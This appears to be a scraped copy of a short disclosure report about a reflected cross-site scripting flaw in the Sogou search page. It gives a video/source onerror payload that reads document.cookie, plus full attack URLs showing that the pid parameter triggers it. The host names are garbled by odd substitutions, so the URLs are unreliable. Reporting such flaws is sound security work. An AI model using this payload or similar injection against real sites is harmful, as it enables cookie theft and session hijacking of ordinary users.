There is a XSS found on Sogou测试数据 Severity: XSS Confidence: Confident Host: http://sogou测试数据 Path: / Issue detail: If you enter the following XSS vector for the search field: "><video><source onerror=alert(document.cookie)> I will get back the following page: http://HdhCmsTestsogou测试数据/sogou?pid=AQxRG&query="><video><source onerror=alert(document.cookie)> However, this particular results page will not cause any XSS. However, after looking at the page for several minutes, the actual parameter that will cause XSS is actually pid http://HdhCmsTestsogou测试数据/sogou?pid=AQxRG"><video><source onerror=alert(document.cookie)>&query="><video><source onerror=alert(document.cookie)> Using the above link, you will see a XSS like the image below.
查看更多关于XSS found on Sogou.com - 网站安全 - 自学php的详细内容...